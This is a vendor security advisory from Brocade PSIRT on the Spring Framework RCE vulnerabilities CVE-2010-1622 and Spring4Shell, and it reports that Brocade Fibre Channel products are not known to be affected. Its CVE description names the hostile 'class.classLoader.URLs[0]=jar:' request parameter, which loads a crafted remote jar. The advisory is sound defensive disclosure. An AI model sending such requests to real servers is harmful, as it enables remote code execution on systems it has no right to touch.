Summary

Security Advisory ID : BSA-2022-1770

Component : SpringSource Spring Framework

Revision : 1.0

CVE-2010-1622: SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .jar file.

Brocade PSIRT has become aware of  the two remote code execution (RCE) vulnerabilities:

• CVE-2022-22963 affecting Spring Cloud Function 
• CVE-2022-22965, known as “Spring4Shell.” affecting Spring Framework.  

According to VMware, the Spring4Shell vulnerability bypasses the patch for CVE-2010-1622, causing CVE-2010-1622 to become exploitable again. The bypass of the patch can occur because Java Development Kit (JDK) versions 9 and later provide two sandbox restriction methods, providing a path to exploit CVE-2010-1622 (JDK versions before 9 only provide one sandbox restriction method).

More information is available at:

• Spring Framework RCE, Early Announcement
• CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+

Brocade has investigated its product line to determine the exposure of Brocade Fibre Channel products from Broadcom.

No Brocade Fibre Channel Products from Broadcom products are currently known to be affected by CVE-2010-1622.